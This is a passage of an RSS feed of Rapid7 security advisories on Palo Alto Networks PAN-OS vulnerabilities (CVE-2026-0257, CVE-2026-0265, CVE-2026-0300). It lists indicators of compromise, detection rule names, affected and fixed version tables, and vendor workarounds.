style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Authentication - Palo Alto GlobalProtect Cookie Authentication to Local Admin Account</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Threat Intel (Rapid7 MDR SOC/IR) - VPN Authentication via Spoofed MAC Address</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Threat Intel (Rapid7 MDR SOC/IR) - Indicator of Compromise Observed </span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious VPN Authentication - Palo Alto GlobalProtect Login via Default Hostname</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious VPN Authentication - Local Account Logon via Generic Non-Human Identity</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious VPN Authentication - Local Account</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Authentication - Vultr</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Authentication - Dromatics Systems</span></p></li></ul><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0257 using an authenticated check available since the May 15 content release.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>IntelHub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>IntelHub customers can look into the Platform to search for more details and correlate the indicators of compromise with the data from their own environment.</span></p><h2 style="direction: ltr;">Known Indicators of Compromise</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Low-cost hosting providers; frequent origin of sustained threat campaigns.</span></p><p></p><table><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Item</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>104.207.144.154</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actor source IP</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>146.19.216.119</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actor source IP</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>146.19.216.120</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actor source IP</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>146.19.216.125</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Threat actor source IP</span></p></td></tr><tr><td><p>209.99.191.137</p></td><td><p>Threat actor source IP</p></td></tr><tr><td><p>79.130.26.202</p></td><td><p>Threat actor source IP</p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>DESKTOP-GP01</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Machinename observed in the GlobalProtect logs alongside Windows authentications first observed on May 21, 2026</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>GP-CLIENT</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Machinename observed in the GlobalProtect logs alongside Linux authentications first observed on May 17, 2026</span></p></td></tr><tr><td><p>Jocker</p></td><td><p>Machinename observed alongside 79.130.26.202</p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>aa:bb:cc:dd:ee:ff</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Spoofed MAC address observed in both waves of successful exploitation</span></p></td></tr></tbody></table><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><strong>May 29, 2026: </strong>Initial publication.</li><li><strong>May 29, 2026: </strong>Added CISA KEV addition. </li><li><span style='font-size: undefined;'><strong>June 2, 2026: </strong></span><span style='font-size: undefined;'>Added IntelHub information under Rapid7 Customers section, updated to reflect Palo Alto Networks change to security advisory (CVSS score change). </span>Added 3 new IOCs (2 IPs and 1 machinename).</li><li><span style='font-size: undefined;'><strong>June 3, 2026:</strong></span><span style='font-size: undefined;'> Added observed URI endpoints accessed for successful VPN connections to the Observed Attacker Behavior section.</span></li></ul><p></p>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-rapid7-observed-exploitation-of-pan-os-globalprotect-authentication-bypass-vulnerability-cve-2026-0257</link>
      <guid isPermaLink="false">bltacc9bfccc9e39c81</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Fri, 29 May 2026 16:49:40 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2026-0265: Authentication Bypass in Palo Alto Networks PAN-OS]]></title>
      <description><![CDATA[<h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Overview</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>On May 13, 2026, Palo Alto Networks published a </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265" target="_blank"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-0265" target="_blank"><span style='font-size: undefined;'>CVE-2026-0265</span></a><span style='font-size: undefined;'>, a </span><a href="https://cwe.mitre.org/data/definitions/347.html" target="_blank"><span style='font-size: undefined;'>signature verification vulnerability</span></a><span style='font-size: undefined;'> that facilitates authentication bypass on </span><a href="https://docs.paloaltonetworks.com/pan-os" target="_blank"><span style='font-size: undefined;'>PAN-OS</span></a><span style='font-size: undefined;'>, the operating system that most Palo Alto Networks firewalls run. This vulnerability allows a remote unauthenticated attacker with network access to bypass authentication when </span><a href="https://docs.paloaltonetworks.com/pan-os/10-1/pan-os-new-features/identity-features/cloud-identity-engine" target="_blank"><span style='font-size: undefined;'>Cloud Authentication Service (CAS)</span></a><span style='font-size: undefined;'> is enabled and attached to a login interface; the vulnerable configuration is non-default but common. CVE-2026-0265 affects PAN-OS on PA-Series and VM-Series firewalls, as well as Panorama (virtual and M-Series) appliances. Cloud NGFW and Prisma Access are not affected.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Palo Alto Networks </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265#Severity:%20HIGH" target="_blank"><span style='font-size: undefined;'>assigned</span></a><span style='font-size: undefined;'> CVE-2026-0265 a “High” 7.2 CVSS score. The advisory states that the vulnerability’s severity scoring depends on interface exposure; according to the vendor, risk is highest for unrestricted management interfaces equipped with CAS, while other login portals, such as GlobalProtect gateways, are lower risk. However, the researcher who reported the vulnerability, </span><a href="https://x.com/rootxharsh" target="_blank"><span style='font-size: undefined;'>Harsh Jaiswal</span></a><span style='font-size: undefined;'> of </span><a href="https://www.hacktron.ai/" target="_blank"><span style='font-size: undefined;'>HacktronAI</span></a><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><strong>publicly disputed the vendor’s severity rating</strong></span><span style='font-size: undefined;'>. Jaiswal </span><a href="https://x.com/rootxharsh/status/2054862374621032774" target="_blank"><span style='font-size: undefined;'>stated</span></a><span style='font-size: undefined;'> on social media that the vulnerability advisory misrepresents the criticality of the bug and the affected components; according to the HacktronAI research team, they successfully exploited CVE-2026-0265 to bypass authentication controls on multiple corporations’ GlobalProtect portals and establish VPN access. Jaiswal </span><a href="https://x.com/rootxharsh/status/2054924700971921635" target="_blank"><span style='font-size: undefined;'>stated</span></a><span style='font-size: undefined;'> that </span><span style='font-size: undefined;'><strong>internet-facing components are affected</strong></span><span style='font-size: undefined;'>, and HacktronAI </span><a href="https://x.com/rootxharsh/status/2054862374621032774" target="_blank"><span style='font-size: undefined;'>plans to disclose</span></a><span style='font-size: undefined;'> full technical details the week of May 18.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As of May 14, Palo Alto Networks has not confirmed exploitation in-the-wild of CVE-2026-0265, and there is no public proof-of-concept exploit available. However, given the researcher's statements about the practical exploitability of this vulnerability and the pending disclosure of technical details, this will likely evolve. PAN-OS software has been a frequent target for threat actors; on May 6, 2026, the PAN-OS vulnerability </span><a href="https://www.rapid7.com/blog/post/etr-critical-buffer-overflow-in-palo-alto-networks-pan-os-user-id-authentication-portal-cve-2026-0300/" target="_blank"><span style='font-size: undefined;'>CVE-2026-0300</span></a><span style='font-size: undefined;'> was </span><a href="https://www.cisa.gov/news-events/alerts/2026/05/06/cisa-adds-one-known-exploited-vulnerability-catalog" target="_blank"><span style='font-size: undefined;'>added</span></a><span style='font-size: undefined;'> to CISA's Known Exploited Vulnerabilities (KEV) catalog. Patches for many affected version streams </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265#Solution" target="_blank"><span style='font-size: undefined;'>were published</span></a><span style='font-size: undefined;'> on May 13, and the remaining patches </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265#Solution" target="_blank"><span style='font-size: undefined;'>are expected</span></a><span style='font-size: undefined;'> on May 28, 2026.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Mitigation guidance</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running PA-Series or VM-Series firewalls, or Panorama (virtual and M-Series) appliances, with Cloud Authentication Service (CAS) enabled should upgrade to a fixed version on an emergency basis. Patches are partially available, with many version stream fixes published on May 13 and additional version stream coverage expected on May 28. The following table outlines the affected and fixed versions:</span></p><table><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>PAN-OS version</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Fixed</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>12.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 12.1.4-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 12.1.7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 12.1.4-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 12.1.7 (ETA: 05/28)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>11.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.7-h13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.10-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.2.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.4-h17 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.7-h13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.10-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.2.12 (ETA: 05/28)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>11.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 11.1.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.7-h6 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 11.1.15 (ETA: 05/28)</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>10.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; 10.2.18-h6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.7-h34 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.13-h21 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.16-h7 (ETA: 05/28)</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= 10.2.18-h6</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cloud NGFW</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Not affected</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Prisma Access</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Not affected</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><p style="direction: ltr;"><span style='font-size: undefined;'>Older unsupported PAN-OS versions should be upgraded to a supported fixed version.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To determine if an environment is vulnerable, the official advisory </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265#Required%20Configuration%20for%20Exposure" target="_blank"><span style='font-size: undefined;'>provides instructions</span></a><span style='font-size: undefined;'> to verify whether an authentication profile using CAS is enabled and attached to a login interface. Due to discrepancies in the information shared by the vendor and reporting researchers, Rapid7 advises patching instead of implementing workarounds, wherever possible.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest official mitigation guidance, please refer to the </span><a href="https://security.paloaltonetworks.com/CVE-2026-0265" target="_blank"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Rapid7 customers</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0265 with authenticated checks expected to be available in the May 15th content release.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Updates</span></h3><ul><li><span style='font-size: undefined;'><strong>May 14, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-cve-2026-0265-authentication-bypass-in-palo-alto-networks-pan-os</link>
      <guid isPermaLink="false">blte92cb76c85ca8319</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Thu, 14 May 2026 19:15:49 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Critical Buffer Overflow in Palo Alto Networks PAN-OS User-ID Authentication Portal (CVE-2026-0300)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Overview</span></h2><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>On May 6, 2026, Palo Alto Networks published a </span><a href="https://security.paloaltonetworks.com/CVE-2026-0300"><span style='font-size: undefined;'>security advisory</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> for </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-0300"><span style='font-size: undefined;'>CVE-2026-0300</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'>, a critical unauthenticated buffer overflow vulnerability affecting PAN-OS PA-Series and VM-Series firewall appliances. Prisma Access, Cloud NGFW, and Panorama appliances are not affected by this vulnerability. The vulnerability carries a CVSSv4 score of </span><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:N/E:A/AU:Y/R:U/V:C/RE:M/U:Red"><span style='font-size: undefined;'>9.3</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> and has been confirmed as exploited in the wild by the vendor.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>CVE-2026-0300 is a buffer overflow (</span><a href="https://cwe.mitre.org/data/definitions/787"><span style='font-size: undefined;'>CWE-787</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'>) in the User-ID™ Authentication Portal (also known as Captive Portal), a non-default PAN-OS feature used to map IP addresses to usernames. An unauthenticated remote attacker can exploit this vulnerability by sending specially crafted packets to a device with the Authentication Portal enabled, achieving arbitrary code execution with root privileges on the affected firewall. No authentication or user interaction is required.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Palo Alto Networks has confirmed limited exploitation in the wild targeting Authentication Portals exposed to either untrusted IP addresses or the public internet. No patches are currently available; fixed versions are expected to begin rolling out on May 13, 2026, with additional releases through May 28, 2026.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>PAN-OS is among the most widely deployed enterprise firewall operating systems in the world. Shodan </span><a href="https://www.shodan.io/search?query=os%3A%22PAN-OS%22"><span style='font-size: undefined;'>identifies</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> approximately 225,000 internet-facing PAN-OS instances, representing a significant attack surface. Rapid7 strongly urges all organizations running affected PAN-OS versions with the User-ID Authentication Portal enabled to </span><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>apply the available workarounds immediately</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'> and prioritize patching as soon as fixed versions become available.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><em>Update #1:</em></span><span style='color:rgb(31, 31, 31);font-size: undefined;'> On May 6, 2026, CVE-2026-0300 was </span><a href="https://www.cisa.gov/news-events/alerts/2026/05/06/cisa-adds-one-known-exploited-vulnerability-catalog"><span style='font-size: undefined;'>added</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> to the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation. Palo Alto Networks Unit 42 also </span><a href="https://unit42.paloaltonetworks.com/captive-portal-zero-day/"><span style='font-size: undefined;'>published</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> a threat brief attributing observed exploitation to CL-STA-1132, a likely state-sponsored threat cluster that deployed open-source tunneling tools and conducted Active Directory enumeration following initial compromise.</span></p><h2 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Mitigation guidance</span></h2><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Organizations running PA-Series and VM-Series firewalls with the User-ID™ Authentication Portal enabled should apply the available workarounds immediately and prioritize patching as soon as fixed versions are released. Check the official </span><a href="https://docs.paloaltonetworks.com/ngfw/administration/user-id/map-ip-addresses-to-users/map-ip-addresses-to-usernames-using-captive-portal/configure-captive-portal"><span style='font-size: undefined;'>documentation</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> to establish whether the affected User-ID™ Authentication Portal is currently enabled.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>According to the Palo Alto Networks advisory, the following versions are affected by CVE-2026-0300:</span></p><p></p><table><colgroup data-width='1000'><col style="width:30.769230769230766%"/><col style="width:24.85207100591716%"/><col style="width:29.585798816568047%"/><col style="width:14.792899408284024%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Product</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Unaffected</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Fix ETA</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 12.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>12.1.4-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>12.1.7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>12.1.4-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>12.1.7</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 11.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.7-h13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.10-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.4-h17</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.7-h13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.10-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.2.12</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 11.1</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.4-h33</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.6-h32</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.7-h6</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.10-h25</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.13-h5</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>11.1.15</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>PAN-OS 10.2</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&lt; </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.18-h6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.7-h34</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.10-h36</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.13-h21</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.16-h7</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>&gt;= </span><span style='color:rgb(24, 128, 56);font-size: undefined;'>10.2.18-h6</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/28</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>05/13</span></p></td></tr></tbody></table><p></p><p>As of May 13, 2026, the first round of patches has been published. Until the remaining awaited patches are available, Palo Alto Networks recommends one of the following workarounds:</p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Restrict User-ID™ Authentication Portal access to only trusted internal zones. Refer to Step 6 of the </span><a href="https://live.paloaltonetworks.com/t5/general-articles/why-it-s-essential-to-secure-your-management-interface/ta-p/1001286"><span style='font-size: undefined;'>Live Community article</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> and the </span><a href="https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u000000CqbiCAC"><span style='font-size: undefined;'>Knowledgebase article</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> for instructions on restricting access.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Disable User-ID™ Authentication Portal entirely if it is not required (Device &gt; User Identification &gt; </span><a href="https://docs.paloaltonetworks.com/ngfw/administration/user-id/map-ip-addresses-to-users/map-ip-addresses-to-usernames-using-captive-portal/configure-captive-portal"><span style='font-size: undefined;'>Authentication Portal Settings</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> &gt; uncheck Enable Authentication Portal).</span></p></li></ul><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Please refer to the vendor </span><a href="https://security.paloaltonetworks.com/CVE-2026-0300"><span style='font-size: undefined;'>advisory</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'> for the latest guidance.</span></p><h2 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Rapid7 customers</span></h2><h3 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0300 with authenticated vulnerability checks available in the May 6th, 2026 content release.</span></p><h2 style="direction: ltr;"><span style='color:rgb(31, 31, 31);'>Updates</span></h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>May 6, 2026</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'>: Initial publication.</span></p></li><li><span style='color:rgb(31, 31, 31);font-size: undefined;'><strong>May 7, 2026</strong></span><span style='color:rgb(31, 31, 31);font-size: undefined;'>: Updated overview to note the addition to CISA KEV and the Unit 42 threat brief attributing exploitation to CL-STA-1132.</span></li><li><span style='color:rgb(31, 31, 